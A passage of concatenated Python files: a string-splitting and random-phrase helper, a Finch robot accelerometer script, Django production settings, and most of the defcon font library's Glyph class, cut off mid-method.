if part == total_parts:
splits.append(mark + string[init_point:])
break
elif init_point == 0:
splits.append(string[:parts])
init_point += parts
else:
splits.append(mark + string[init_point:(init_point + parts)])
init_point += parts
return splits
def randphras(l=5, upper=True, lower=True, digit=True, punct=False, nofd=False):
names = []
if punct:
names.append('string.punctuation')
if upper:
names.append('string.ascii_uppercase')
if lower:
names.append('string.ascii_lowercase')
if digit:
names.append('string.digits')
phrass = ''
for n in range(l):
if len(phrass) == 0 and nofd:
char = random.choice(string.ascii_lowercase)
else:
char = random.choice(eval(random.choice(names)))
phrass += char
return phrass
|
from finch import Finch
from time import sleep
from random import randint
tweety = Finch()
accList = []
left, right = tweety.obstacle()
tweety.wheels(.46, .5)
while 1:
x,y,z,tap,shake = tweety.acceleration()
acc = [x, y, z]
accList.append(acc)
# print ("X : ", x)
# print ("Y : ", y)
# print ("Z : ", z)
left, right = tweety.obstacle()
#sleep(.5)
tweety.wheels(0.0,0.0)
print(accList)
tweety.close()
|
from settings.common import *
DATABASES = {
'default': SECRETS_DICT['DATABASES']['LIVE']
}
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
ALLOWED_HOSTS = ['*']
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(PROJECT_PATH, 'static'),
)
|
from __future__ import absolute_import
import weakref
from warnings import warn
from fontTools.misc.py23 import basestring
from fontTools.misc.arrayTools import unionRect
from defcon.objects.base import BaseObject
from defcon.objects.contour import Contour
from defcon.objects.point import Point
from defcon.objects.component import Component
from defcon.objects.anchor import Anchor
from defcon.objects.lib import Lib
from defcon.objects.guideline import Guideline
from defcon.objects.image import Image
from defcon.objects.color import Color
from defcon.tools.representations import glyphAreaRepresentationFactory
from defcon.pens.decomposeComponentPointPen import DecomposeComponentPointPen
def addRepresentationFactory(name, factory):
warn("addRepresentationFactory is deprecated. Use the functions in defcon.__init__.", DeprecationWarning)
Glyph.representationFactories[name] = dict(factory=factory, destructiveNotifications=["Glyph.Changed"])
def removeRepresentationFactory(name):
warn("removeRepresentationFactory is deprecated. Use the functions in defcon.__init__.", DeprecationWarning)
del Glyph.representationFactories[name]
class Glyph(BaseObject):
"""
This object represents a glyph and it contains contour, component, anchor
and other assorted bits data about the glyph.
**This object posts the following notifications:**
============================
Name
============================
Glyph.Changed
Glyph.BeginUndo
Glyph.EndUndo
Glyph.BeginRedo
Glyph.EndRedo
Glyph.NameWillChange
Glyph.NameChanged
Glyph.UnicodesChanged
Glyph.WidthChanged
Glyph.HeightChanged
Glyph.NoteChanged
Glyph.LibChanged
Glyph.ImageChanged
Glyph.ImageWillBeDeleted
Glyph.ContourWillBeAdded
Glyph.ContourWillBeDeleted
Glyph.ContoursChanged
Glyph.ComponentWillBeAdded
Glyph.ComponentWillBeDeleted
Glyph.ComponentsChanged
Glyph.AnchorWillBeAdded
Glyph.AnchorWillBeDeleted
Glyph.AnchorsChanged
Glyph.GuidelineWillBeAdded
Glyph.GuidelineWillBeDeleted
Glyph.GuidelinesChanged
Glyph.MarkColorChanged
Glyph.VerticalOriginChanged
============================
The Glyph object has list like behavior. This behavior allows you to interact
with contour data directly. For example, to get a particular contour::
contour = glyph[0]
To iterate over all contours::
for contour in glyph:
To get the number of contours::
contourCount = len(glyph)
To interact with components or anchors in a similar way,
use the ``components`` and ``anchors`` attributes.
"""
changeNotificationName = "Glyph.Changed"
beginUndoNotificationName = "Glyph.BeginUndo"
endUndoNotificationName = "Glyph.EndUndo"
beginRedoNotificationName = "Glyph.BeginRedo"
endRedoNotificationName = "Glyph.EndRedo"
representationFactories = {
"defcon.glyph.area" : dict(
factory=glyphAreaRepresentationFactory,
destructiveNotifications=("Glyph.ContoursChanged", "Glyph.ComponentsChanged", "Glyph.ComponentBaseGlyphDataChanged")
)
}
def __init__(self, layer=None,
contourClass=None, pointClass=None, componentClass=None, anchorClass=None,
guidelineClass=None, libClass=None, imageClass=None):
layerSet = font = None
if layer is not None:
layerSet = layer.layerSet
if layerSet is not None:
font = weakref.ref(layer.layerSet.font)
layerSet = weakref.ref(layer.layerSet)
layer = weakref.ref(layer)
self._font = font
self._layerSet = layerSet
self._layer = layer
super(Glyph, self).__init__()
self.beginSelfNotificationObservation()
self._isLoading = False
self._dirty = False
self._name = None
self._unicodes = []
self._width = 0
self._height = 0
self._note = None
self._image = None
self._identifiers = set()
self._shallowLoadedContours = None
self._contours = []
self._components = []
self._anchors = []
self._guidelines = []
self._lib = None
if contourClass is None:
contourClass = Contour
if pointClass is None:
pointClass = Point
if componentClass is None:
componentClass = Component
if anchorClass is None:
anchorClass = Anchor
if guidelineClass is None:
guidelineClass = Guideline
if libClass is None:
libClass = Lib
if imageClass is None:
imageClass = Image
self._contourClass = contourClass
self._pointClass = pointClass
self._componentClass = componentClass
self._anchorClass = anchorClass
self._guidelineClass = guidelineClass
self._libClass = libClass
self._imageClass = imageClass
def __del__(self):
super(Glyph, self).__del__()
self._contours = None
self._components = None
self._anchors = None
self._guidelines = None
self._lib = None
self._image = None
# --------------
# Parent Objects
# --------------
def getParent(self):
return self.font
def _get_font(self):
if self._font is None:
return None
return self._font()
font = property(_get_font, doc="The :class:`Font` that this glyph belongs to.")
def _get_layerSet(self):
if self._layerSet is None:
return None
return self._layerSet()
layerSet = property(_get_layerSet, doc="The :class:`LayerSet` that this glyph belongs to.")
def _get_layer(self):
if self._layer is None:
return None
return self._layer()
layer = property(_get_layer, doc="The :class:`Layer` that this glyph belongs to.")
# ----------------
# Basic Attributes
# ----------------
# identifiers
def _get_identifiers(self):
return self._identifiers
identifiers = property(_get_identifiers, doc="Set of identifiers for the glyph. This is primarily for internal use.")
# name
def _set_name(self, value):
oldName = self._name
if oldName != value:
self.postNotification(notification="Glyph.NameWillChange", data=dict(oldValue=oldName, newValue=value))
self._name = value
self.postNotification(notification="Glyph.NameChanged", data=dict(oldValue=oldName, newValue=value))
self.dirty = True
def _get_name(self):
return self._name
name = property(_get_name, _set_name, doc="The name of the glyph. Setting this posts *GLyph.NameChanged* and *Glyph.NameChanged* notifications.")
# unicodes
def _get_unicodes(self):
return list(self._unicodes)
def _set_unicodes(self, value):
oldValue = self.unicodes
if oldValue != value:
self._unicodes = value
self.postNotification(notification="Glyph.UnicodesChanged", data=dict(oldValue=oldValue, newValue=value))
self.dirty = True
unicodes = property(_get_unicodes, _set_unicodes, doc="The list of unicode values assigned to the glyph. Setting this posts *Glyph.UnicodesChanged* and *Glyph.Changed* notifications.")
def _get_unicode(self):
if self._unicodes:
return self._unicodes[0]
return None
def _set_unicode(self, value):
if value is None:
self.unicodes = []
else:
existing = list(self._unicodes)
if value in existing:
existing.pop(existing.index(value))
existing.insert(0, value)
self.unicodes = existing
unicode = property(_get_unicode, _set_unicode, doc="The primary unicode value for the glyph. This is the equivalent of ``glyph.unicodes[0]``. This is a convenience attribute that works with the ``unicodes`` attribute.")
# -------
# Metrics
# -------
# bounds
def _getContourComponentBounds(self, attr):
bounds = None
subObjects = [contour for contour in self]
subObjects += [component for component in self.components]
for subObject in subObjects:
b = getattr(subObject, attr)
if b is not None:
if bounds is None:
bounds = b
else:
bounds = unionRect(bounds, b)
return bounds
def _get_bounds(self):
return self._getContourComponentBounds("bounds")
bounds = property(_get_bounds, doc="The bounds of the glyph's outline expressed as a tuple of form (xMin, yMin, xMax, yMax).")
def _get_controlPointBounds(self):
return self._getContourComponentBounds("controlPointBounds")
controlPointBounds = property(_get_controlPointBounds, doc="The control bounds of all points in the glyph. This only measures the point positions, it does not measure curves. So, curves without points at the extrema will not be properly measured.")
# area
def _get_area(self):
return self.getRepresentation("defcon.glyph.area")
area = property(_get_area, doc="The area of the glyph's outline.")
# margins
def _get_leftMargin(self):
bounds = self.bounds
if bounds is None:
return None
xMin, yMin, xMax, yMax = bounds
return xMin
def _set_leftMargin(self, value):
bounds = self.bounds
if bounds is None:
return
xMin, yMin, xMax, yMax = bounds
oldValue = xMin
diff = value - xMin
if value != oldValue:
self.move((diff, 0))
self.width += diff
self.dirty = True
leftMargin = property(_get_leftMargin, _set_leftMargin, doc="The left margin of the glyph. Setting this post *Glyph.WidthChanged* and *Glyph.Changed* notifications among others.")
def _get_rightMargin(self):
bounds = self.bounds
if bounds is None:
return None
xMin, yMin, xMax, yMax = bounds
return self._width - xMax
def _set_rightMargin(self, value):
bounds = self.bounds
if bounds is None:
return
xMin, yMin, xMax, yMax = bounds
oldValue = self._width - xMax
if oldValue != value:
self.width = xMax + value
self.dirty = True
rightMargin = property(_get_rightMargin, _set_rightMargin, doc="The right margin of the glyph. Setting this posts *Glyph.WidthChanged* and *Glyph.Changed* notifications among others.")
def _get_bottomMargin(self):
bounds = self.bounds
if bounds is None:
return None
xMin, yMin, xMax, yMax = bounds
if self.verticalOrigin is None:
return yMin
else:
return yMin - (self.verticalOrigin - self.height)
def _set_bottomMargin(self, value):
bounds = self.bounds
if bounds is None:
return
xMin, yMin, xMax, yMax = bounds
if self.verticalOrigin is None:
oldValue = yMin
self.verticalOrigin = self.height
else:
oldValue = yMin - (self.verticalOrigin - self.height)
diff = value - oldValue
if value != oldValue:
self.height += diff
self.dirty = True
bottomMargin = property(_get_bottomMargin, _set_bottomMargin, doc="The bottom margin of the glyph. Setting this post *Glyph.HeightChanged* and *Glyph.Changed* notifications among others.")
def _get_topMargin(self):
bounds = self.bounds
if bounds is None:
return None
xMin, yMin, xMax, yMax = bounds
if self.verticalOrigin is None:
return self._height - yMax
else:
return self.verticalOrigin - yMax
def _set_topMargin(self, value):
bounds = self.bounds
if bounds is None:
return
xMin, yMin, xMax, yMax = bounds
if self.verticalOrigin is None:
oldValue = self._height - yMax
else:
oldValue = self.verticalOrigin - yMax
diff = value - oldValue
if oldValue != value:
self.verticalOrigin = yMax + value
self.height += diff
self.dirty = True
topMargin = property(_get_topMargin, _set_topMargin, doc="The top margin of the glyph. Setting this posts *Glyph.HeightChanged*, *Glyph.VerticalOriginChanged* and *Glyph.Changed* notifications among others.")
# width
def _get_width(self):
return self._width
def _set_width(self, value):
oldValue = self._width
if oldValue != value:
self._width = value
self.postNotification(notification="Glyph.WidthChanged", data=dict(oldValue=oldValue, newValue=value))
self.dirty = True
width = property(_get_width, _set_width, doc="The width of the glyph. Setting this posts *Glyph.WidthChanged* and *Glyph.Changed* notifications.")
# height
def _get_height(self):
return self._height
def _set_height(self, value):
oldValue = self._height
if oldValue != value:
self._height = value
self.postNotification(notification="Glyph.HeightChanged", data=dict(oldValue=oldValue, newValue=value))
self.dirty = True
height = property(_get_height, _set_height, doc="The height of the glyph. Setting this posts *Glyph.HeightChanged* and *Glyph.Changed* notifications.")
# ----------------------
# Lib Wrapped Attributes
# ----------------------
# mark color
def _get_markColor(self):
value = self.lib.get("public.markColor")
if value is not None:
value = Color(value)
return value
def _set_markColor(self, value):
# convert to a color object
if value is not None:
value = Color(value)
# don't write if there is no change
oldValue = self.lib.get("public.markColor")
if oldValue is not None:
oldValue = Color(oldValue)
if value == oldValue:
return
# remove
if value is None:
if "public.markColor" in self.lib:
del self.lib["public.markColor"]
# store
else:
self.lib["public.markColor"] = value
self.postNotification(notification="Glyph.MarkColorChanged", data=dict(oldValue=oldValue, newValue=value))
markColor = property(_get_markColor, _set_markColor, doc="The glyph's mark color. When setting, the value can be a UFO color string, a sequence of (r, g, b, a) or a :class:`Color` object. Setting this posts *Glyph.MarkColorChanged* and *Glyph.Changed* notifications.")
# vertical origin
def _get_verticalOrigin(self):
value = self.lib.get("public.verticalOrigin")
return value
def _set_verticalOrigin(self, value):
# don't write if there is no change
oldValue = self.lib.get("public.verticalOrigin")
if value == oldValue:
return
# remove
if value is None:
if "public.verticalOrigin" in self.lib:
del self.lib["public.verticalOrigin"]
# store
else:
self.lib["public.verticalOrigin"] = value
self.postNotification(notification="Glyph.VerticalOriginChanged", data=dict(oldValue=oldValue, newValue=value))
verticalOrigin = property(_get_verticalOrigin, _set_verticalOrigin, doc="The glyph's vertical origin. Setting this posts *Glyph.VerticalOriginChanged* and *Glyph.Changed* notifications.")
# -------
# Pen API
# -------
def draw(self, pen):
"""
Draw the glyph with **pen**.
"""
from fontTools.pens.pointPen import PointToSegmentPen
pointPen = PointToSegmentPen(pen)
self.drawPoints(pointPen)
def drawPoints(self, pointPen):
"""
Draw the glyph with **pointPen**.
"""
if self._shallowLoadedContours:
self._drawShallowLoadedContours(pointPen, self._shallowLoadedContours)
else:
for contour in self._contours:
contour.drawPoints(pointPen)
for component in self._components:
component.drawPoints(pointPen)
def _drawShallowLoadedContours(self, pointPen, contours):
for contour in contours:
try:
pointPen.beginPath(identifier=contour.get("identifier"))
except TypeError:
pointPen.beginPath()
warn("The beginPath method needs an identifier kwarg. The contour's identifier value has been discarded.", DeprecationWarning)
for args, kwargs in contour["points"]:
pointPen.addPoint(*args, **kwargs)
pointPen.endPath()
def getPen(self):
"""
Get the pen used to draw into this glyph.
"""
from fontTools.pens.pointPen import SegmentToPointPen
return SegmentToPointPen(self.getPointPen())
def getPointPen(self):
"""
Get the point pen used to draw into this glyph.
"""
from defcon.pens.glyphObjectPointPen import GlyphObjectPointPen, GlyphObjectLoadingPointPen
if self._isLoading:
self._shallowLoadedContours = []
return GlyphObjectLoadingPointPen(self)
else:
return GlyphObjectPointPen(self)
# --------
# Contours
# --------
def _get_contourClass(self):
return self._contourClass
contourClass = property(_get_contourClass, doc="The class used for contours.")
def _get_pointClass(self):
return self._pointClass
pointClass = property(_get_pointClass, doc="The class used for points.")
def _fullyLoadShallowLoadedContours(self):
if not self._shallowLoadedContours:
self._shallowLoadedContours = None
return
self.disableNotifications()
contours = list(self._shallowLoadedContours)
self._shallowLoadedContours = None
dirty = self.dirty
pointPen = self.getPointPen()
self._drawShallowLoadedContours(pointPen, contours)
self.dirty = dirty
self.enableNotifications()
def instantiateContour(self):
contour = self._contourClass(
glyph=self,
pointClass=self.pointClass
)
return contour
def beginSelfContourNotificationObservation(self, contour):
if contour.dispatcher is None:
return
contour.addObserver(observer=self, methodName="_contourChanged", notification="Contour.Changed")
def endSelfContourNotificationObservation(self, contour):
if contour.dispatcher is None:
return
contour.removeObserver(observer=self, notification="Contour.Changed")
contour.endSelfNotificationObservation()
def appendContour(self, contour):
"""
Append **contour** to the glyph. The contour must be a defcon
:class:`Contour` object or a subclass of that object. An error
will be raised if the contour's identifier or a point identifier
conflicts with any of the identifiers within the glyph.
This will post a *Glyph.Changed* notification.
"""
self.insertContour(len(self), contour)
def insertContour(self, index, contour):
"""
Insert **contour** into the glyph at index. The contour
must be a defcon :class:`Contour` object or a subclass
of that object. An error will be raised if the contour's
identifier or a point identifier conflicts with any of
the identifiers within the glyph.
This will post a *Glyph.Changed* notification.
"""
assert contour not in self
assert contour.glyph in (self, None), "This contour belongs to another glyph."
self.postNotification(notification="Glyph.ContourWillBeAdded", data=dict(object=contour))
if contour.glyph is None:
identifiers = self._identifiers
if contour.identifier is not None:
assert contour.identifier not in identifiers
identifiers.add(contour.identifier)
for point in contour:
if point.identifier is not None:
assert point.identifier not in identifiers
identifiers.add(point.identifier)
contour.glyph = self
contour.beginSelfNotificationObservation()
self.beginSelfContourNotificationObservation(contour)
self._contours.insert(index, contour)
self.postNotification(notification="Glyph.ContoursChanged")
self.dirty = True
def removeContour(self, contour):
"""
Remove **contour** from the glyph.
This will post a *Glyph.Changed* notification.
"""
if contour not in self:
raise IndexError("contour not in glyph")
self.postNotification(notification="Glyph.ContourWillBeDeleted", data=dict(object=contour))
identifiers = self._identifiers
if contour.identifier is not None:
identifiers.remove(contour.identifier)
for point in contour:
if point.identifier is not None:
identifiers.remove(point.identifier)
self._contours.remove(contour)
self.endSelfContourNotificationObservation(contour)
self.postNotification(notification="Glyph.ContoursChanged")
self.dirty = True
def contourIndex(self, contour):
"""
Get the index for **contour**.
"""
return self._getContourIndex(contour)
def clearContours(self):
"""
Clear all contours from the glyph.
This posts a *Glyph.Changed* notification.
"""
self.holdNotifications(note="Requested by Glyph.clearContours.")
for contour in reversed(self):
self.removeContour(contour)
self.releaseHeldNotifications()
def correctContourDirection(self, trueType=False, segmentLength=10):
"""
Correct the direction of all contours in the glyph.
This posts a *Glyph.Changed* notification.
"""
# set the contours to the same direction
for contour in self:
contour.clockwise = False
# sort the contours by area in reverse (i.e. largest first)
contours = sorted(self, key=lambda contour: -contour.area)
# build a tree of nested contours
tree = {}
for largeIndex, largeContour in enumerate(contours):
for smallContour in contours[largeIndex + 1:]:
if largeContour.contourInside(smallContour, segmentLength=segmentLength):
if largeContour not in tree:
tree[largeContour] = []
tree[largeContour].append(smallContour)
# run through the tree, largest to smallest, flipping
# the direction of each contour nested within another contour
for largeContour in contours:
if largeContour in tree:
for smallContour in tree[largeContour]:
smallContour.reverse()
# set to the opposite if needed
if trueType:
for contour in self:
contour.reverse()
# ----------
# Components
# ----------
def _get_componentClass(self):
return self._componentClass
componentClass = property(_get_componentClass, doc="The class used for components.")
def _get_components(self):
return list(self._components)
components = property(_get_components, doc="An ordered list of :class:`Component` objects stored in the glyph.")
def instantiateComponent(self):
component = self._componentClass(
glyph=self
)
return component
def beginSelfComponentNotificationObservation(self, component):
if component.dispatcher is None:
return
component.addObserver(observer=self, methodName="_componentChanged", notification="Component.Changed")
component.addObserver(observer=self, methodName="_componentBaseGlyphDataChanged", notification="Component.BaseGlyphDataChanged")
def endSelfComponentNotificationObservation(self, component):
if component.dispatcher is None:
return
component.removeObserver(observer=self, notification="Component.Changed")
component.removeObserver(observer=self, notification="Component.BaseGlyphDataChanged")
component.endSelfNotificationObservation()
def appendComponent(self, component):
"""
Append **component** to the glyph. The component must be a defcon
:class:`Component` object or a subclass of that object. An error
will be raised if the component's identifier conflicts with any of
the identifiers within the glyph.
This will post a *Glyph.Changed* notification.
"""
self.insertComponent(len(self._components), component)
def insertComponent(self, index, component):
"""
Insert **component** into the glyph at index. The component
must be a defcon :class:`Component` object or a subclass
of that object. An error will be raised if the component's
identifier conflicts with any of the identifiers within
the glyph.
This will post a *Glyph.Changed* notification.
"""
assert component not in self._components
assert component.glyph in (self, None), "This component belongs to another glyph."
self.postNotification(notification="Glyph.ComponentWillBeAdded", data=dict(object=component))
if component.glyph is None:
if component.identifier is not None:
identifiers = self._identifiers
assert component.identifier not in identifiers
identifiers.add(component.identifier)
component.glyph = self
component.beginSelfNotificationObservation()
self.beginSelfComponentNotificationObservation(component)
self._components.insert(index, component)
self.postNotification(notification="Glyph.ComponentsChanged")
self.dirty = True
def removeComponent(self, component):
"""
Remove **component** from the glyph.
This will post a *Glyph.Changed* notification.
"""
self.postNotification(notification="Glyph.ComponentWillBeDeleted", data=dict(object=component))
if component.identifier is not None:
self._identifiers.remove(component.identifier)
self._components.remove(component)
self.endSelfComponentNotificationObservation(component)
self.postNotification(notification="Glyph.ComponentsChanged")
self.dirty = True
def componentIndex(self, component):
"""
Get the index for **component**.
"""
return self._components.index(component)
def clearComponents(self):
"""
Clear all components from the glyph.
This posts a *Glyph.Changed* notification.
"""
self.holdNotifications(note="Requested by Glyph.clearComponents.")
for component in reversed(self._components):
self.removeComponent(component)
self.releaseHeldNotifications()
def decomposeComponent(self, component):
"""
Decompose **component**. This will preserve the identifiers
in the incoming contours and points unless there is a conflict.
In that case, the conflicting incoming identifier will be discarded.
This posts *Glyph.ComponentsChanged*, *Glyph.ContoursChanged*
and *Glyph.Changed* notifications.
"""
self.holdNotifications(note="Requested by Glyph.decomposeComponent.")
layer = self.layer
pointPen = DecomposeComponentPointPen(self, layer)
self._decomposeComponent(component, layer, pointPen)
self.releaseHeldNotifications()
self.postNotification(notification="Glyph.ContoursChanged")
def decomposeAllComponents(self):
"""
Decompose all components in this glyph. This will preserve the
identifiers in the incoming contours and points unless there is a
conflict. In that case, the conflicting incoming identifier will
be discarded.
This posts *Glyph.ComponentsChanged*, *Glyph.ContoursChanged*
and *Glyph.Changed* notifications.
"""
if not self.components:
return
self.holdNotifications(note="Requested by Glyph.decomposeAllComponents.")
layer = self.layer
pointPen = DecomposeComponentPointPen(self, layer)
for component in self.components:
self._decomposeComponent(component, layer, pointPen)
self.releaseHeldNotifications()
self.postNotification(notification="Glyph.ContoursChanged")
def _decomposeComponent(self, component, layer, pointPen):
pointPen.skipConflictingIdentifiers = True
component.drawPoints(pointPen)
self.removeComponent(component)
# -------
# Anchors
# -------
def _get_anchorClass(self):
return self._anchorClass
anchorClass = property(_get_anchorClass, doc="The class used for anchors.")
def _get_anchors(self):
return list(self._anchors)
def _set_anchors(self, value):
self.clearAnchors()
self.holdNotifications(note="Requested by Glyph._set_anchors.")
for anchor in value:
self.appendAnchor(anchor)
self.releaseHeldNotifications()
anchors = property(_get_anchors, _set_anchors, doc="An ordered list of :class:`Anchor` objects stored in the glyph.")
def instantiateAnchor(self, anchorDict=None):
anchor = self._anchorClass(anchorDict=anchorDict)
return anchor
def beginSelfAnchorNotificationObservation(self, anchor):
if anchor.dispatcher is None:
return
anchor.addObserver(observer=self, methodName="_anchorChanged", notification="Anchor.Changed")
def endSelfAnchorNotificationObservation(self, anchor):
if anchor.dispatcher is None:
return
anchor.removeObserver(observer=self, notification="Anchor.Changed")
anchor.endSelfNotificationObservation()
def appendAnchor(self, anchor):
"""
Append **anchor** to the glyph. The anchor must be a defcon
:class:`Anchor` object or a subclass of that object. An error
will be raised if the anchor's identifier conflicts with any of
the identifiers within the glyph.
This will post a *Glyph.Changed* notification.
"""
self.insertAnchor(len(self._anchors), anchor)
def insertAnchor(self, index, anchor):
"""
Insert **anchor** into the glyph at index. The anchor
must be a defcon :class:`Anchor` object or a subclass
of that object. An error will be raised if the anchor's
identifier conflicts with any of the identifiers within
the glyph.
This will post a *Glyph.Changed* notification.
"""
try:
assert anchor.glyph is None
except AttributeError:
pass
self.postNotification(notification="Glyph.AnchorWillBeAdded")
if not isinstance(anchor, self._anchorClass):
anchor = self.instantiateAnchor(anchorDict=anchor)
if anchor.identifier is not None:
identifiers = self._identifiers
assert anchor.identifier not in identifiers
identifiers.add(anchor.identifier)
anchor.glyph = self
anchor.beginSelfNotificationObservation()
self.beginSelfAnchorNotificationObservation(anchor)
self._anchors.insert(index, anchor)
self.postNotification(notification="Glyph.AnchorsChanged")
self.dirty = True
def removeAnchor(self, anchor):
"""
Remove **anchor** from the glyph.
This will post a *Glyph.Changed* notification.
"""
self.postNotification(notification="Glyph.AnchorWillBeDeleted", data=dict(object=anchor))
if anchor.identifier is not None:
self._identifiers.remove(anchor.identifier)
self._anchors.remove(anchor)
self.endSelfAnchorNotificationObservation(anchor)
self.postNotification(notification="Glyph.AnchorsChanged")
self.dirty = True
def anchorIndex(self, anchor):
"""
Get the index for **anchor**.
"""
return self._anchors.index(anchor)
def clearAnchors(self):
"""
Clear all anchors from the glyph.
This posts a *Glyph.Changed* notification.
"""
self.holdNotifications(note="Requested by Glyph.clearAnchors.")
for anchor in reversed(self._anchors):
self.removeAnchor(anchor)
self.releaseHeldNotifications()
# ----------
# Guidelines
# ----------
def _get_guidelineClass(self):
return self._guidelineClass
guidelineClass = property(_get_guidelineClass, doc="The class used for guidelines.")
def _get_guidelines(self):
return list(self._guidelines)
def _set_guidelines(self, value):
self.clearGuidelines()
self.holdNotifications(note="Requested by Glyph._set_guidelines.")
for guideline in value:
self.appendGuideline(guideline)
self.releaseHeldNotifications()
guidelines = property(_get_guidelines, _set_guidelines, doc="An ordered list of :class:`Guideline` objects stored in the glyph. Setting this will post a *Glyph.Changed* notification along with any notifications posted by the :py:meth:`Glyph.appendGuideline` and :py:meth:`Glyph.clearGuidelines` methods.")
def instantiateGuideline(self, guidelineDict=None):
guideline = self._guidelineClass(guidelineDict=guidelineDict)
return guideline
def beginSelfGuidelineNotificationObservation(self, guideline):
if guideline.dispatcher is None:
return
guideline.addObserver(observer=self, methodName="_guidelineChanged", notification="Guideline.Changed")
def endSelfGuidelineNotificationObservation(self, guideline):
if guideline.dispatcher is None:
return
guideline.removeObserver(observer=self, notification="Guideline.Changed")
guideline.endSelfNotificationObservation()
def appendGuideline(self, guideline):
"""
Append **guideline** to the glyph. The guideline must be a defcon
:class:`Guideline` object or a subclass of that object. An error
will be raised if the guideline's identifier conflicts with any of
the identifiers within the glyph.
This will post a *Glyph.Changed* notification.
"""
self.insertGuideline(len(self._guidelines), guideline)
def insertGuideline(self, index, guideline):
"""
Insert **guideline** into the glyph at index. The guideline
must be a defcon :class:`Guideline` object or a subclass
of that object. An error will be raised if the guideline's
identifier conflicts with any of the identifiers within
the glyph.
This will post a *Glyph.Changed* notification.
"""
assert id(guideline) not in [id(guide) for guide in self.guidelines]
self.postNotification(notification="Glyph.GuidelineWillBeAdded")
if not isinstance(guideline, self._guidelineClass):
guideline = self.instantiateGuideline(guidelineDict=guideline)
assert guideline.glyph in (self, None), "This guideline belongs to another glyph."
if guideline.glyph is None:
assert guideline.font is None, "This guideline belongs to a font."
if guideline.glyph is None:
if guideline.identifier is not None:
identifiers = self._identifiers
assert guideline.identifier not in identifiers
if guideline.identifier is not None:
identifiers.add(guideline.identifier)
guideline.glyph = self
guideline.beginSelfNotificationObservation()
self.beginSelfGuidelineNotificationObservation(guideline)
self._guidelines.insert(index, guideline)
self.postNotification(notification="Glyph.GuidelinesChanged")
self.dirty = True
def removeGuideline(self, guideline):
"""
Remove **guideline** from the glyph.
This will post a *Glyph.Changed* notification.
"""
self.postNotification(notification="Glyph.GuidelineWillBeDeleted", data=dict(object=guideline))
if guideline.identifier is not None:
self._identifiers.remove(guideline.identifier)
self._guidelines.remove(guideline)
self.endSelfGuidelineNotificationObservation(guideline)
self.postNotification(notification="Glyph.GuidelinesChanged")
self.dirty = True
def guidelineIndex(self, guideline):
"""
Get the index for **guideline**.
"""
return self._guidelines.index(guideline)
def clearGuidelines(self):
"""
Clear all guidelines from the glyph.
This posts a *Glyph.Changed* notification.
"""
self.holdNotifications(note="Requested by Glyph.clearGuidelines.")
for guideline in reversed(self._guidelines):
self.removeGuideline(guideline)
self.releaseHeldNotifications()
# ----
# Note
# ----
def _get_note(self):
return self._note
def _set_note(self, value):
if value is not None:
assert isinstance(value, basestring)
oldValue = self._note
if oldValue != value:
self._note = value
self.postNotification(notification="Glyph.NoteChanged", data=dict(oldValue=oldValue, newValue=value))
self.dirty = True
note = property(_get_note, _set_note, doc="An arbitrary note for the glyph. Setting this will post a *Glyph.Changed* notification.")
# ---
# Lib
# ---
def _get_libClass(self):
return self._libClass
libClass = property(_get_libClass, doc="The class used for the lib.")
def instantiateLib(self):
lib = self._libClass(
glyph=self
)
return lib
def _get_lib(self):
if self._lib is None:
self._lib = self.instantiateLib()
self.beginSelfLibNotificationObservation()
return self._lib
def _set_lib(self, value):
lib = self.lib
lib.clear()
lib.update(value)
self.dirty = True
lib = property(_get_lib, _set_lib, doc="The glyph's :class:`Lib` object. Setting this will clear any existing lib data and post a *Glyph.Changed* notification if data was replaced.")
def beginSelfLibNotificationObservation(self):
if self._lib.dispatcher is None:
return
self._lib.addObserver(observer=self, methodName="_libContentChanged", notification="Lib.Changed")
def endSelfLibNotificationObservation(self):
if self._lib is None:
return
if self._lib.dispatcher is None:
return
self._lib.removeObserver(observer=self, notification="Lib.Changed")
self._lib.endSelfNotificationObservation()
# -----
# Image
# -----
def _get_imageClass(self):
return self._imageClass
imageClass = property(_get_imageClass, doc="The class used for the image.")
def instantiateImage(self):
image = self._imageClass(
glyph=self
)
return image
def _get_image(self):
if self._image is None:
self._image = self.instantiateImage()
self.beginSelfImageNotificationObservation()
return self._image
def _set_image(self, image):
# removing image
if image is None:
if self._image is not None:
self.postNotification(notification="Glyph.ImageWillBeDeleted")
self.endSelfImageNotificationObservation()
self._image = None
self.postNotification(notification="Glyph.ImageChanged")
self.dirty = True
# adding image
else:
if self._image is None:
# create the image object
i = self.image
if set(self._image.items()) != set(image.items()):
self._image.fileName = image["fileName"]
self._image.transformation = (image["xScale"], image["xyScale"], image["yxScale"], image["yScale"], image["xOffset"], image["yOffset"])
self._image.color = image.get("color")
self.postNotification(notification="Glyph.ImageChanged")
self.dirty = True
image = property(_get_image, _set_image, doc="The glyph's :class:`Image` object. Setting this posts *Glyph.ImageChanged* and *Glyph.Changed* notifications.")
def clearImage(self):
self.image = None
def beginSelfImageNotificationObservation(self):
if self._image.dispatcher is None:
return
self._image.addObserver(observer=self, methodName="_imageChanged", notification="Image.Changed")
self._image.addObserver(observer=self, methodName="_imageDataChanged", notification="Image.ImageDataChanged")
def endSelfImageNotificationObservation(self):
if self._image is None:
return
if self._image.dispatcher is None:
return
self._image.removeObserver(observer=self, notification="Image.Changed")
self._image.removeObserver(observer=self, notification="Image.ImageDataChanged")
self._image.endSelfNotificationObservation()
# -------------
# List Behavior
# -------------
def __contains__(self, contour):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return contour in self._contours
def __len__(self):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return len(self._contours)
def __iter__(self):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return iter(self._contours)
def __getitem__(self, index):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return self._contours[index]
def _getContourIndex(self, contour):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return self._contours.index(contour)
# ----------------
# Glyph Absorption
# ----------------
def copyDataFromGlyph(self, glyph):
"""
Copy data from **glyph**. This copies the following data:
==========
width
height
unicodes
note
image
contours
components
anchors
guidelines
lib
==========
The name attribute is purposefully omitted.
"""
from copy import deepcopy
self.width = glyph.width
self.height = glyph.height
self.unicodes = list(glyph.unicodes)
self.note = glyph.note
self.guidelines = [self.instantiateGuideline(g) for g in glyph.guidelines]
self.anchors = [self.instantiateAnchor(a) for a in glyph.anchors]
self.image = glyph.image
